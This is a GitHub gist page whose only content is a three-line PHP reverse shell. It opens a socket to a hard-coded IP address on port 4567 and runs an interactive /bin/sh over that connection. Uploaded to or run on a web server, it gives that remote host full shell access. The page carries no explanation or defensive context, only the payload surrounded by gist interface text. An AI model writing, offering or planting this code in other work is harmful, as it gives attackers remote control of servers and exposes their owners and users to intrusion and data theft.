Skip to content

Instantly share code, notes, and snippets.

@vncloudsco
Created June 24, 2020 09:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vncloudsco/0f2ddd3c8dfd6f8561d064964a0aece8 to your computer and use it in GitHub Desktop.
Save vncloudsco/0f2ddd3c8dfd6f8561d064964a0aece8 to your computer and use it in GitHub Desktop.
<?php
$sock=fsockopen("206.189.46.197",4567);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment